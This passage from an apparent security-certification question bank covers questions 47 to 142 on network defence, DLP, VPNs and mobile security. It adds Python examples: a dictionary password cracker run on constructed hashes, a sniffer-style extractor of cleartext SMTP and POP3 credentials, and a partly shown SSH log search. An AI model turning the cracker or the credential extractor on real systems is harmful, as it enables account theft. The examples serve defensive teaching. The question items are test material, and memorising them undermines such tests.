- C. It is connection-based, not load-based.
- D. It works only on Unix/Linux servers.
- 48. There has been a breach of the ACME network. John manages the SIEM at ACME. Part
- of the attack disrupted NTP; what SIEM issue would this most likely impact?
- A. Time synchronization
- B. Correlation
- C. Event duplication
- D. Events not being logged
- 49. What command would produce the image shown here?
- A. ping -n 6 -l 100 192.168.1.1
- B. ping 192.168.1.1 -n 6 -s 100
- C. ping #6 s 100 192.168.1.1
- D. ping -s 6 -w 100 192.168.1.1
- 50. You are a security officer for a large law firm. You are concerned about data loss prevention.
- You have limited the use of USBs and other portable media, you use an IDS to look
- for large volumes of outbound data, and a guard searches all personnel and bags before
- they leave the building. What is a key step in DLP that you have missed?
- A. Portable drives
- B. Email
- C. Bluetooth
- D. Optical media
- 51. Which of the following email security measures would have the most impact on
- phishing emails?
- A. Email encryption
- B. Hardening the email server
- C. Digitally signing email
- D. Spam filter
- 52. Joanne has implemented TLS for communication with many of her network servers. She
- wants to ensure that the traffic cannot be sniffed. However, users now complain that this
- is slowing down connectivity. Which of the following is the best solution?
- A. Increase RAM on servers.
- B. Change routers to give more bandwidth to traffic to these servers.
- C. Implement TLS accelerators.
- D. Place all servers in clusters with extensive load-balancing.
- 53. Olivia has discovered steganography tools on an employee’s computer. What is the
- greatest concern regarding employees having steganography tools?
- A. Password cracking
- B. Data exfiltration
- C. Hiding network traffic
- D. Malware
- 54. What command would generate the output shown here?
- A. netstat -a
- B. netstat -o
- C. arp -a
- D. arp -g
- 55. John has discovered that an attacker is trying to get network passwords by using software
- that attempts a number of passwords from a list of common passwords. What type of
- attack is this?
- A. Dictionary
- B. Rainbow table
- C. Brute force
- D. Session hijacking
- 56. Isabella has found netcat installed on an employee’s computer. That employee is not
- authorized to have netcat. What security concern might this utility present?
- A. It is a password cracker.
- B. It is a packet sniffer.
- C. It is a network communication utility.
- D. It is a DoS tool.
- 57. Omar is a network administrator for ACME Company. He is responsible for the certificate
- authorities within the corporate network. The CAs publish their CRLs once per
- week. What, if any, security issue might this present?
- A. Revoked certificates still being used
- B. Invalid certificates being issued
- C. No security issue
- D. Certificates with weak keys
- 58. Hans is a network administrator for a large bank. He is concerned about employees violating
- software licenses. What would be the first step in addressing this issue?
- A. Performing software audits
- B. Scanning the network for installed applications
- C. Establishing clear policies
- D. Blocking the ability of users to install software
- 59. You are responsible for authentication methods at your company. You have implemented
- fingerprint scanners to enter server rooms. Frequently people are being denied access to
- the server room, even though they are authorized. What problem is this?
- A. FAR
- B. FRR
- C. CER
- D. EER
- 60. John is responsible for network security at a very small company. Due to both budget
- constraints and space constraints, John can select only one security device. What should
- he select?
- A. Firewall
- B. Antivirus
- C. IDS
- D. UTM
- 61. You are responsible for security at Acme Company. Recently, 20 new employee network
- accounts were created, with the default privileges for the network. You have discovered
- that eight of these have privileges that are not needed for their job tasks. Which security
- principle best describes how to avoid this problem in the future?
- A. Least privileges
- B. Separation of duties
- C. Implicit deny
- D. Weakest link
- 62. Mary is concerned that SIEM logs at her company are not being stored long enough, or
- securely enough. She is aware that it is possible a breach might not be discovered until
- long after it occurs. This would require the company to analyze older logs. It is important
- that Mary find an SIEM log backup solution that can a) handle all the aggregate logs of
- the SIEM, b) be maintained for a long period of time, and c) be secure. What solution
- would be best for her?
- A. Back up to large-capacity external drives.
- B. Back up to large-capacity backup tapes.
- C. Back up to WORM storage.
- D. Back up to tapes that will be stored off-site.
- 63. Elizabeth is responsible for SIEM systems in her company. She monitors the company’s
- SIEM screens every day, checking every hour. What, if any, would be a better approach
- for her to keep up with issues that appear in the logs?
- A. Automatic alerts
- B. Having logs forwarded to her email
- C. Nothing, this is fine.
- 64. You are responsible for network security at a university. Faculty members are issued
- laptops. However, many of the faculty members leave the laptops in their offices most of
- the time (sometimes even for weeks). You are concerned about theft of laptops. In this
- scenario, what would be the most cost-effective method of securing the laptops?
- A. FDE
- B. GPS tagging
- C. Geofencing
- D. Tethering
- 65. You work at a defense contracting company. You are responsible for mobile device
- security. Some researchers in your company use company-issued tablets for work. These
- tablets may contain sensitive, even classified data. What is the most important security
- measure for you to implement?
- A. FDE
- B. GPS tagging
- C. Geofencing
- D. Content management
- 66. When using any HIDS/HIPS or NIDS/NIPS, the output is specific to the vendor. However,
- what is the basic set of information that virtually all HIDSs/HIPSs or
- NIDSs/NIPSs provide?
- A. IP addresses (sender and receiver), ports (sender and receiver), and protocol
- B. IP addresses (sender and receiver), ports (sender and receiver), and attack type
- C. IP addresses (sender and receiver), ports (sender and receiver), usernames, and
- machine names
- D. Usernames, machine names, and attack type
- 67. You are responsible for firewalls in your company. You are reviewing the output of the
- gateway firewall. What basic information would any firewall have in its logs?
- A. For all traffic: the source and destination IP and port, protocol, and whether it was
- allowed or denied
- B. For only blocked traffic: the source and destination IP and port as well as the reason
- for the traffic being denied/blocked
- C. For all traffic: the source and destination IP and port, whether it was allowed or
- denied, and the reason it was denied/blocked
- D. For only blocked traffic: the source and destination IP, protocol, and the reason it
- was denied/blocked
- 68. Teresa is responsible for incident response at ACME Company. There was a recent breach
- of the network. The breach was widespread and affected many computers. As part of the
- incident response process, Teresa will collect the logs from the SIEM, which aggregates
- logs from 20 servers. Which of the following should she do first?
- A. Event de-duplication
- B. Log forwarding
- C. Identify the nature of the attack
- D. Identify the source IP of the attack
- 69. Hector is responsible for NIDS/NIPS in his company. He is configuring a new NIPS
- solution. What part of the NIPS collects data?
- A. Sensor
- B. Data source
- C. Manager
- D. Analyzer
- 70. Gerald is a network administrator for a small financial services company. He is responsible
- for controlling access to resources on his network. What mechanism is responsible
- for blocking access to a resource based on the requesting IP address?
- A. ACL
- B. NIPS
- C. HIPS
- D. Port blocking
- 71. Elizabeth is responsible for secure communications at her company. She wants to give
- administrators the option to log in remotely and to execute command-line functions, but
- she wants this to only be possible via a secure, encrypted connection. What action should
- she take on the firewall?
- A. Block port 23 and allow ports 20 and 21.
- B. Block port 22 and allow ports 20 and 21.
- C. Block port 22 and allow port 23.
- D. Block port 23 and allow port 22.
- 72. Mark is looking for a proxy server for his network. The purpose of the proxy server is
- to ensure that the web servers are hidden from outside clients. All of the different web
- servers should appear to the outside world as if they were the proxy server. What type of
- proxy server would be best for Mark to consider?
- A. Forward
- B. Reverse
- C. Transparent
- D. Firewall
- 73. Your company has hired an outside security firm to perform various tests of your
- network. During the vulnerability scan you will provide that company with logins for
- various systems (i.e., database server, application server, web server, etc.) to aid in their
- scan. What best describes this?
- A. A white-box test
- B. A gray-box test
- C. A credentialed scan
- D. A logged-in scan
- 74. Lars is responsible for incident response at ACME Company. He is particularly concerned
- about the network segment that hosts the corporate web servers. He wants a solution that
- will detect potential attacks and notify the administrator so the administrator can take
- whatever action he or she deems appropriate. Which of the following would be the best
- solution for Lars?
- A. HIDS
- B. HIPS
- C. NIDS
- D. NIPS
- 75. Mia is responsible for security devices at her company. She is concerned about detecting
- intrusions. She wants a solution that would work across entire network segments. However,
- she wants to ensure that false positives do not interrupt work flow. What would be
- the best solution for Mia to consider?
- A. HIDS
- B. HIPS
- C. NIDS
- D. NIPS
- 76. Abigail is a security manager for a small company. Many employees want to use handheld
- devices, such as smartphones and tablets. The employees want to use these devices both
- for work and outside of work. Abigail is concerned about security issues. Which of the
- following would be the most secure solution?
- A. COPE
- B. CYOD
- C. Geotagging
- D. BYOD
- 77. You are responsible for always-on VPN connectivity for your company. You have been
- told that you must use the most secure mode for IPSec that you can. Which of the following
- would be the best for you to select?
- A. Tunneling
- B. AH
- C. IKE
- D. Transport
- 78. Debra is the network administrator for her company. Her company’s web servers are all in
- a cluster. Her concern is this: if one of the servers in the cluster fails, will the backup server
- be capable of running for a significant amount of time? She wants to make sure that the
- backup won’t soon fail. What would be her best choice in clustering?
- A. Active-active
- B. Round-robin
- C. Affinity
- D. Active-passive
- 79. Omar is responsible for wireless security in his company. He wants completely different
- WiFi access (i.e., a different SSID, different security levels, and different authentication
- methods) in different parts of the company. What would be the best choice for Omar to
- select in WAPs?
- A. Fat
- B. Thin
- C. Repeater
- D. Full
- 80. Lilly is a network administrator for a medium-sized financial services company. She wants
- to implement company-wide encryption and digital signing of emails. But she is concerned
- about cost, since there is a very limited budget for this. What would be her best choice?
- A. SMTPS
- B. S/MIME
- C. IMAPS
- D. PGP
- 81. Edward is a security manager for a bank. He has recently been reading a great deal
- about malware that accesses system memory. He wants to find a solution that would
- stop programs from utilizing system memory. Which of the following would be the
- best solution?
- A. DEP
- B. FDE
- C. UTM
- D. IDS
- 82. Sarah is the CIO for a small company. She recently had the entire company’s voice calls
- moved to VoIP. Her new VoIP system is using SIP with RTP. What might be the concern
- with this?
- A. SIP is not secure.
- B. RTP is not secure.
- C. RTP is too slow.
- D. SIP is too slow.
- 83. What command would generate the output shown here?
- A. nslookup
- B. ipconfig
- C. netstat -a
- D. dig
- 84. Emiliano is a network administrator for a large web-hosting company. His company also
- issues digital certificates to web-hosting clients. He wants to ensure that a digital certificate
- will not be used once it has been revoked. He also wants to ensure that there will be
- no delay between when the certificate is revoked and when browsers are made aware that
- it is revoked. What solution would be best for this?
- A. OCSP
- B. X.509
- C. CRL
- D. PKI
- 85. Elizabeth is responsible for security at a defense contracting company. She is concerned
- about users within her network exfiltrating data by attaching sensitive documents to
- emails. What solution would best address this concern?
- A. Email encryption
- B. USB blocking
- C. NIPS
- D. Content filtering
- 86. Victor is concerned about data security on BYOD and COPE. He is concerned specifically
- about data exposure should the device become lost or stolen. Which of the following
- would be most effective in countering this concern?
- A. Geofencing
- B. Screen lock
- C. GPS tagging
- D. Device encryption
- 87. Gabriel is using nmap to scan one of his servers whose IP address is 192.168.1.1. He wants
- to perform a ping scan, but the network blocks ICMP, so he will try a TCP ping scan and
- do so very slowly. Which of the following would accomplish that?
- A. nmap -O -PT -T1 192.168.1.1
- B. nmap -O -T3 192.168.1.1
- C. nmap -T -T1 192.168.1.1
- D. nmap -PT -T5 192.168.1.1
- 88. Mary is a network administrator for ACME Company. She sometimes needs to run a
- packet sniffer so that she can view the network traffic. She wants to find a well-known
- packet sniffer that works on Linux. Which of the following would be her best choice?
- A. Ophcrack
- B. Nmap
- C. Wireshark
- D. Tcpdump
- 89. What command produced the output shown here?
- A. tracert -h 10 www.chuckeasttom.com
- B. tracert www.chuckeasttom.com
- C. netstat www.chuckeasttom.com
- D. nmap www.chuckeasttom.com
- 90. Daryll has been using a packet sniffer to observe traffic on his company’s network. He has
- noticed that traffic between the web server and the database server is sent in clear text.
- He wants a solution that will not only encrypt that traffic, but also leverage the existing
- digital certificate infrastructure his company has. Which of the following would be the
- best solution for Daryll?
- A. TLS
- B. SSL
- C. IPSec
- D. WPA2
- 91. Jarod is concerned about DLP in his organization. Employees all have cloud-based solutions
- for data storage. What DLP-related security hazard, if any, might this create?
- A. No security hazard
- B. Malware from the cloud
- C. Data exfiltration through the cloud
- D. Security policies don’t apply to the cloud.
- 92. Derrick is a network administrator for a large company. The company network is segmented
- into zones of high security, medium security, low security, and the DMZ. He is
- concerned about external intruders and wishes to install a honeypot. Which is the most
- important zone to put the honeypot in?
- A. High security
- B. Medium security
- C. Low security
- D. DMZ
- 93. Sheila is responsible for data backups for all the company servers. She is concerned about
- frequency of backup and about security of the backup data. Which feature, found in some
- backup utility software, would be most important to her?
- A. Using data encryption
- B. Digitally signing the data
- C. Using automated backup scheduling
- D. Hashing the backup data
- 94. Frank is a web server administrator for a large e-commerce company. He is concerned
- about someone using netcat to connect to the company web server and retrieving detailed
- information about the server. What best describes his concern?
- A. Passive reconnaissance
- B. Active reconnaissance
- C. Banner grabbing
- D. Vulnerability scanning
- 95. Mike is responsible for testing security at his company. He is using a tool that identifies
- vulnerabilities and provides mechanisms to test them by attempting to exploit them. What
- best describes this type of tool?
- A. Vulnerability scanner
- B. Exploit framework
- C. Metasploit
- D. Nessus
- 96. William is a security officer for a large bank. When executives’ laptops are decommissioned,
- he wants to ensure that the data on those laptops is completely wiped so that it
- cannot be recovered, even using forensic tools. How many times should William wipe a
- hard drive?
- A. 1
- B. 3
- C. 5
- D. 7
- 97. You are responsible for firewalls in your organization. You are concerned about ensuring
- that all firewalls are properly configured. The gateway firewall is configured as follows:
- to only allow inbound traffic on a very few specific, required ports; all traffic (allowed
- or blocked) is logged and logs forwarded to the SIEM. What, if anything, is missing from
- this configuration?
- A. Nothing, it is a good configuration.
- B. Encrypting all traffic
- C. Outbound connection rules
- D. Digital certificate authentication for inbound traffic
- 98. Charles is responsible for security for web servers in his company. Some web servers are
- used for an internal intranet, and some for external websites. He has chosen to encrypt
- all web traffic, and he is using self-signed X.509 certificates. What, if anything, is wrong
- with this approach?
- A. He cannot encrypt all HTTP traffic.
- B. He should use PGP certificates.
- C. He should not use self-signed certificates.
- D. Nothing; this is an appropriate configuration.
- 99. You are responsible for the security of web servers at your company. You are configuring
- the WAF and want to allow only encrypted traffic to and from the web server, including
- traffic from administrators using a command-line interface. What should you do?
- A. Open port 80 and 23, and block port 443.
- B. Open port 443 and 23, and block port 80.
- C. Open port 443 and 22, and block port 80 and 23.
- D. Open port 443, and block all other ports.
- 100. Francis is a security administrator at a large law firm. She is concerned that confidential
- documents, with proprietary information, might be leaked. The leaks could be intentional
- or accidental. She is looking for a solution that would embed some identifying information
- into documents in such a way that it would not be seen by the reader but could be
- extracted with the right software. What technology would best meet Francis’s needs?
- A. Symmetric encryption
- B. Steganography
- C. Hashing
- D. Asymmetric encryption
- 101. You are responsible for the gateway firewall for your company. You need to configure a
- firewall to allow only email that is encrypted to be sent or received. What action should
- you take?
- A. Allow ports 25, 110, and 143. Block ports 465, 993, and 995.
- B. Block ports 25, 110, and 143. Allow ports 465, 993, and 995.
- C. Allow ports 25, 110, and 443. Block ports 465, 993, and 143.
- D. Block ports 465, 994, and 464. Allow ports 25, 110, and 80.
- 102. Mark is responsible for security for a small bank. He has a firewall at the gateway as well
- as one at each network segment. Each firewall logs all accepted and rejected traffic. Mark
- checks each of these logs regularly. What is the first step Mark should take to improve his
- firewall configuration?
- A. Integrate with SIEM.
- B. Add a honeypot.
- C. Integrate with AD.
- D. Add a honeynet.
- 103. You are setting up VPNs in your company. You are concerned that anyone running a
- packet sniffer could obtain metadata about the traffic. You have chosen IPSec. What
- mode should you use to accomplish your goals of preventing metadata being seen?
- A. AH
- B. ESP
- C. Tunneling
- D. Transport
- 104. John is responsible for configuring security devices in his network. He has implemented a
- robust NIDS in his network. However, on two occasions the NIDS has missed a breach.
- What configuration issue should John address?
- A. False negative
- B. Port blocking
- C. SPI
- D. False positive
- 105. You are responsible for communications security at your company. Your company has a
- large number of remote workers, including traveling salespeople. You wish to make sure that
- when they connect to the network, it is in a secure manner. What should you implement?
- A. L2TP VPN
- B. IPSec VPN
- C. Site-to-site VPN
- D. Remote-access VPN
- 106. Your company is issuing portable devices to employees for them to use for both work and
- personal use. This is done so the company can control the security of the devices. What, if
- anything, is an issue this process will cause?
- A. Personal information being exposed
- B. Company data being exfiltrated
- C. Devices being insecurely configured
- D. No issues
- 107. Marsha is responsible for mobile device security. Her company uses COPE for mobile
- devices. All phones and tablets have a screen lock and GPS tagging. What is the next,
- most important step for Marsha to take to secure the phones?
- A. Implement geofencing.
- B. Implement application management.
- C. Implement geolocation.
- D. Implement remote wipe.
- 108. Valerie is responsible for mobile device security at her company. The company is using
- BYOD. She is concerned about employees’ personal device usage compromising company
- data on the phones. What technology would best address this concern?
- A. Containerization
- B. Screen lock
- C. Full disk encryption
- D. Biometrics
- 109. Jack is a chief information security officer (CISO) for a small marketing company. The
- company’s sales staff travel extensively and all use mobile devices. He has recently become
- concerned about sideloading. Which of the following best describes sideloading?
- A. Installing applications to Android devices via USB
- B. Loading software on any device via WiFi
- C. Bypassing the screen lock
- D. Loading malware on a device without the user being aware
- 110. You are responsible for DLP at a large company. Some employees have COPE and others
- BYOD. What DLP issue might these devices present?
- A. COPE can be USB OTG.
- B. BYOD can be USB OTG.
- C. COPE and BYOD can be USB OTG.
- D. Only jailbroken COPE or BYOD can be USB OTG.
- 111. John is responsible for network security at a large company. He is concerned about a
- variety of attacks but DNS poisoning in particular. Which of the following protocols
- would provide the most help in mitigating this issue?
- A. IPSec
- B. DNSSEC
- C. L2TP
- D. TLS
- 112. You are responsible for network security at your company. You have discovered that NTP
- is not functioning properly. What security protocol will most likely be affected by this?
- A. RADIUS
- B. DNSSEC
- C. IPSec
- D. Kerberos
- 113. Frank is concerned about DHCP starvation attacks. He is even more worried since he
- learned that anyone can download software called a “gobbler” and execute a DHCP
- starvation attack. What technology would most help him mitigate this risk?
- A. Encrypt all DHCP communication with TLS.
- B. FDE on the DHCP server
- C. Network Address Allocation
- D. IPSec for all DHCP communications
- 114. You are trying to allocate appropriate numbers of IP addresses for various subnets in your
- network. What would be the proper CIDR notation for an IPv4 subnet with 59 nodes?
- A. /27
- B. /29
- C. /24
- D. /26
- 115. Lydia is trying to reduce costs at her company and at the same time centralize network
- administration and maintain direct control of the network. Which of the following solutions
- would provide the most network administration centralization and control while
- reducing costs?
- A. Outsourcing network administration
- B. IaaS
- C. PaaS
- D. Moving all OSs to open source
- 116. You are investigating a remote access protocol for your company to use. The protocol
- needs to fully encrypt the message, use reliable transport protocols, and support a range
- of network protocols. Which of the following would be the best choice?
- A. RADIUS
- B. Diameter
- C. TACACS+
- D. IPSec
- 117. Carrol is responsible for network connectivity in her company. The sales department is
- transitioning to VoIP. What are two protocols she must allow through the firewall?
- A. RADIUS and SNMP
- B. TCP and UDP
- C. SIP and RTP
- D. RADIUS and SIP
- 118. John is setting up all the database servers on their own subnet. He has placed them on
- 10.10.3.3/29. How many nodes can be allocated in this subnet?
- A. 32
- B. 16
- C. 8
- D. 6
- 119. Carlos is a security manager for a small company that does medical billing and records
- management. He is using application blacklisting to prevent malicious applications from
- being installed. What, if anything, is the weakness with this approach?
- A. None, this is the right approach.
- B. It might block legitimate applications.
- C. It might fail to block malicious applications.
- D. It will limit productivity.
- 120. Joanne is a security administrator for a large company. She discovered that approximately
- 100 machines on her network were recently attacked by a major virus. She is concerned
- because there was a patch available that would have stopped the virus from having any
- impact. What is the best solution for her to implement on her network?
- A. Installing patch management software
- B. Using automatic updates
- C. Putting unpatched machines on a Bridge
- D. Scanning all machines for patches every day
- 121. A review of your company’s network traffic shows that most of the malware infections are
- caused by users visiting illicit websites. You want to implement a solution that will block
- these websites, scan all web traffic for signs of malware, and block the malware before it
- enters the company network. Which of the following technologies would be the best
- solution?
- A. IDS
- B. Firewall
- C. UTM
- D. SIEM
- 122. You work for a large bank. The bank is trying to limit the risk associated with the use of
- unapproved USB devices to copy documents. Which of the following would be the best
- solution to this problem?
- A. IDS
- B. DLP
- C. Content filtering
- D. NIPS
- 123. Match the letter of the functionality with the device in the following table.
- A. Detect intrusions on a single machine
- B. Use aggregate logs
- C. Filter network packets based on a set of rules
- D. Detect intrusions on a network segment
- Firewall
- HIDS
- SIEM
- NIDS
- 124. Francine is concerned about employees in her company jailbreaking their COPE devices.
- What would be the most critical security concern for jailbroken devices?
- A. They would no longer get security patches.
- B. It would disable FDE.
- C. Unauthorized applications could be installed.
- D. Data could be exfiltrated on these devices.
- 125. You are responsible for mobile device security in your company. Employees have COPE
- devices. Many employees only enter the office infrequently, and you are concerned that
- their devices are not receiving firmware updates on time. What is the best solution for this
- problem?
- A. Scheduled office visits for updates
- B. OTA updates
- C. Moving from COPE to BYOD
- D. A policy that requires users to update their firmware regularly
- 126. Frank is looking for a remote authentication and access protocol. It must be one that uses
- UDP due to firewall rules. Which of the following would be the best choice?
- A. RADIUS
- B. Diameter
- C. TACACS+
- D. IPSec
- 127. You have discovered that one of the employees at your company tethers her smartphone
- to her work PC to bypass the corporate web security and access prohibited websites while
- connected to the LAN. What would be the best way to prevent this?
- A. Disable wireless access.
- B. Implement a WAF.
- C. Implement a policy against tethering.
- D. Implement an HIPS.
- 128. You work for a large bank. One of your responsibilities is to ensure that web banking
- logins are as secure as possible. You are concerned that a customer’s account login could
- be compromised and someone else would use that login to access the customer’s account.
- What is the best way to mitigate this threat?
- A. Use SMS authentication for any logins from an unknown location or computer.
- B. Encrypt all traffic via TLS.
- C. Require strong passwords.
- D. Do not allow customers to log on from any place other than their home computer.
- 129. You have discovered that some employees in your company have installed custom firmware
- on their portable devices. What security flaw would this most likely lead to?
- A. Unauthorized software can run on the device.
- B. The device may not connect to the network.
- C. The device will overheat.
- D. This is not really a security issue.
- 130. You are configuring BYOD access for your company. You want the absolute most robust
- security for the BYOD on your network. What would be the best solution?
- A. Agentless NAC
- B. Agent NAC
- C. Digital certificate authentication
- D. Two-factor authentication
- 131. You work for a large law firm and are responsible for network security. It is common for
- guests to come to the law firm (clients, expert witnesses, etc.) who need to connect to the
- firm’s WiFi. You wish to ensure that you provide the maximum security when these guests
- connect with their own devices, but you also wish to provide assurance to the guest that
- you will have minimal impact on their device. What is the best solution?
- A. Permanent NAC agent
- B. Agentless NAC
- C. Dissolvable NAC agent
- D. Implement COPE
- 132. Tom is concerned about how his company can best respond to breaches. He is interested
- in finding a way to identify files that have been changed during the breach. What would
- be the best solution for him to implement?
- A. NAC
- B. NIDS
- C. File integrity checker
- D. Vulnerability scanner
- 133. Mary works for a large insurance company and is responsible for cybersecurity. She is
- concerned about insiders and wants to detect malicious activity on the part of insiders.
- But she wants her detection process to be invisible to the attacker. What technology best
- fits these needs?
- A. Hybrid NIDS
- B. Out-of-band NIDS
- C. NIPS
- D. NNIDS
- 134. Denish is responsible for security at a large financial services company. The company
- frequently uses SSL/TLS for connecting to external resources. He has concerns that an
- insider might exfiltrate data using an SSL/TLS tunnel. What would be the best solution to
- this issue?
- A. NIPS
- B. SSL decryptor
- C. NIDS
- D. SSL accelerator
- 135. You want to allow a media gateway to be accessible through your firewall. What ports
- should you open? (Choose two.)
- A. 2427
- B. 1707
- C. 2227
- D. 1727
- 136. Match the letter with the protocol in the following table.
- A. Wireless security
- B. Voice over IP
- C. VPN
- D. Secure command-line interface
- IPSec
- WPA2
- SSH
- SIP
- 137. Dennis is implementing wireless security throughout his network. He is using WPA2.
- However, there are some older machines that cannot connect to WPA2—they only
- support WEP. At least for now, he must keep these machines. What is the best solution
- for this problem?
- A. Put those machines on a different VLAN.
- B. Deny wireless capability for those machines.
- C. Put those machines on a separate wireless network with separate WAP.
- D. Encrypt their traffic with TLS.
- 138. You are a security administrator for Acme Company. Employees in your company
- routinely upload and download files. You are looking for a method that allows users to
- remotely upload or download files in a secure manner. The solution must also support
- more advanced file operations such as creating directories, deleting files, and so forth.
- What is the best solution for this?
- A. SFTP
- B. SSH
- C. SCP
- D. IPSec
- 139. Your company allows BYOD on the network. You are concerned about the risk of malicious
- apps being introduced to your network. Which of the following policies would be most helpful
- in mitigating that risk?
- A. Prohibiting apps from third-party stores
- B. Application blacklisting
- C. Antimalware scanning
- D. Requiring FDE on BYOD
- 140. John is the CISO for a small company. The company has password policies, but John is
- not sure the policies are adequate. He is concerned that someone might be able to “crack”
- company passwords. What is the best way for John to determine whether his passwords
- are vulnerable?
- A. Run a good vulnerability scan.
- B. Perform a password policy audit.
- C. Use one or more password crackers himself.
- D. Ensure that passwords are stored as a hash.
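- What "running a password cracker himself" looks like in practice, as an added example that is not part of the original question bank. The stored hashes, the wordlist and the mangling rules are all constructed for the demonstration (the unsalted SHA-256 storage is deliberately weak so the run completes offline in a fraction of a second); the point it makes is that two passwords which satisfy a typical length-and-complexity policy still fall to a dictionary run, which is why the audit has to test the passwords and not only the policy.

```python
import hashlib

# Constructed sample: unsalted SHA-256 hashes of three passwords. Unsalted fast
# hashes are themselves a weakness; they are used here only so the example runs
# offline. Real systems should store a salted, slow hash (bcrypt, scrypt, Argon2).
SAMPLE_HASHES = {
    "alice": hashlib.sha256(b"Password1").hexdigest(),
    "bob":   hashlib.sha256(b"summer2019!").hexdigest(),
    "carol": hashlib.sha256(b"Xq7#vL9!pR2mZ").hexdigest(),
}

# Constructed mini wordlist; a real run uses millions of leaked passwords.
WORDLIST = ["password", "summer", "welcome", "letmein", "qwerty"]


def candidates(base):
    """Mangling rules of the kind crackers apply: capitalisation, digit/year suffixes, a trailing symbol."""
    for word in (base, base.capitalize()):
        yield word
        for suffix in ("1", "123", "2019", "2019!", "!"):
            yield word + suffix


def crack(hashes, wordlist):
    """Return {user: plaintext} for every stored hash matched by a dictionary-plus-rules run."""
    by_hash = {}
    for user, digest in hashes.items():
        by_hash.setdefault(digest, []).append(user)   # several users may share a password
    found = {}
    for word in wordlist:
        for cand in candidates(word):
            digest = hashlib.sha256(cand.encode()).hexdigest()
            for user in by_hash.get(digest, ()):
                found[user] = cand
    return found


def meets_naive_policy(pw, min_len=8):
    """A typical complexity rule: minimum length plus three of four character classes."""
    classes = sum([
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
        any(not c.isalnum() for c in pw),
    ])
    return len(pw) >= min_len and classes >= 3


if __name__ == "__main__":
    for user, pw in crack(SAMPLE_HASHES, WORDLIST).items():
        print(f"{user}: {pw!r} cracked; passes policy: {meets_naive_policy(pw)}")
```

- Both cracked passwords ("Password1" and "summer2019!") pass the eight-character, three-class rule, while carol's random password survives the run. A real audit would point a tool such as John the Ripper or hashcat at an export of the real hashes, with authorisation in writing and the export handled as the sensitive data it is.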
- 141. You are scanning your network using a packet sniffer. You are seeing traffic on ports
- 25 and 110. What security flaw would you most likely notice on these ports?
- A. Website vulnerabilities
- B. Unencrypted credentials
- C. Misconfigured FTP
- D. Digital certificate errors
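- The flaw question 141 points at is that SMTP on port 25 and POP3 on port 110, without STARTTLS, carry logins in the clear, so a sniffer position on the segment is enough to harvest them. The detector below is an added example, not code from the original question bank: it runs over constructed payload snippets (not captured traffic) and pulls the username and password out of an SMTP AUTH PLAIN line (the single-line form; the two-step form, where the base64 blob follows a 334 reply on its own line, is not handled) and out of a POP3 USER/PASS pair.

```python
import base64
import re

# Constructed sample: decoded TCP payloads as a sniffer would present them,
# tagged with the destination port. Not real captured traffic.
SAMPLE_FLOWS = [
    {"src": "10.0.5.21", "dst": "10.0.1.9", "dport": 25,
     "payload": "EHLO laptop\r\nAUTH PLAIN "
                + base64.b64encode(b"\x00alice\x00secret").decode() + "\r\n"},
    {"src": "10.0.5.33", "dst": "10.0.1.9", "dport": 110,
     "payload": "USER bob\r\nPASS hunter2\r\nSTAT\r\n"},
    {"src": "10.0.5.40", "dst": "10.0.1.9", "dport": 25,
     "payload": "EHLO mailer\r\nMAIL FROM:<x@example.test>\r\n"},   # no AUTH, nothing to flag
    {"src": "10.0.5.41", "dst": "10.0.1.9", "dport": 993,
     "payload": "\x16\x03\x01..."},                                   # TLS record, opaque
]


def smtp_credentials(payload):
    """Username/password from a cleartext SMTP AUTH PLAIN line (RFC 4616: authzid NUL authcid NUL passwd)."""
    m = re.search(r"^AUTH PLAIN (\S+)", payload, re.MULTILINE)
    if not m:
        return None
    try:
        parts = base64.b64decode(m.group(1)).split(b"\x00")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if len(parts) != 3:
        return None
    return parts[1].decode(errors="replace"), parts[2].decode(errors="replace")


def pop3_credentials(payload):
    """Username/password from a POP3 USER/PASS exchange."""
    user = re.search(r"^USER (\S+)", payload, re.MULTILINE)
    pw = re.search(r"^PASS (\S+)", payload, re.MULTILINE)
    if user and pw:
        return user.group(1), pw.group(1)
    return None


def find_cleartext_credentials(flows):
    """Flag every flow on 25/110 that carried a recoverable login."""
    findings = []
    for f in flows:
        creds = None
        if f["dport"] == 25:
            creds = smtp_credentials(f["payload"])
        elif f["dport"] == 110:
            creds = pop3_credentials(f["payload"])
        if creds:
            findings.append({"src": f["src"], "dport": f["dport"],
                             "user": creds[0], "password": creds[1]})
    return findings


if __name__ == "__main__":
    for hit in find_cleartext_credentials(SAMPLE_FLOWS):
        print(f"{hit['src']} -> port {hit['dport']}: {hit['user']} / {hit['password']}")
```

- The fix on the server side is to require STARTTLS (or the implicit-TLS ports 465/995) before AUTH or USER is accepted; the same check run after the change should return nothing.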
- 142. Abigail is a network administrator with ACME Company. She believes that a network
- breach has occurred in the data center as a result of a misconfigured router access list,
- allowing outside access to an SSH server. Which of the following should she search for
- in the logs to confirm if such a breach occurred?
- A. Traffic on port 23
- B. Traffic on port 22
- C. Unencrypted credentials
- D. Malformed network packets
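- The log search from question 142, as an added example that is not part of the original question bank. The log lines are constructed to mimic a router ACL log entry (the "list NAME permitted tcp a.b.c.d(port) -> e.f.g.h(port)" shape of a Cisco IOS IPACCESSLOGP message is the assumption here; adapt the regex to your platform). The check keeps only permitted tcp/22 connections whose source lies outside the RFC 1918 ranges, which is exactly the traffic the misconfigured access list should never have let through.

```python
import ipaddress
import re

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Field layout assumed for the ACL log entry; adjust for other platforms.
LOG_RE = re.compile(
    r"list (?P<acl>\S+) (?P<action>permitted|denied) (?P<proto>\w+) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\((?P<sport>\d+)\) -> "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\((?P<dport>\d+)\)"
)

# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
Jun 12 03:14:07 edge-rtr1 %SEC-6-IPACCESSLOGP: list EXT-IN permitted tcp 203.0.113.45(51234) -> 10.0.1.20(22), 1 packet
Jun 12 03:14:09 edge-rtr1 %SEC-6-IPACCESSLOGP: list EXT-IN permitted tcp 198.51.100.7(44010) -> 10.0.1.20(443), 1 packet
Jun 12 03:15:30 edge-rtr1 %SEC-6-IPACCESSLOGP: list EXT-IN denied tcp 203.0.113.45(51240) -> 10.0.1.21(22), 1 packet
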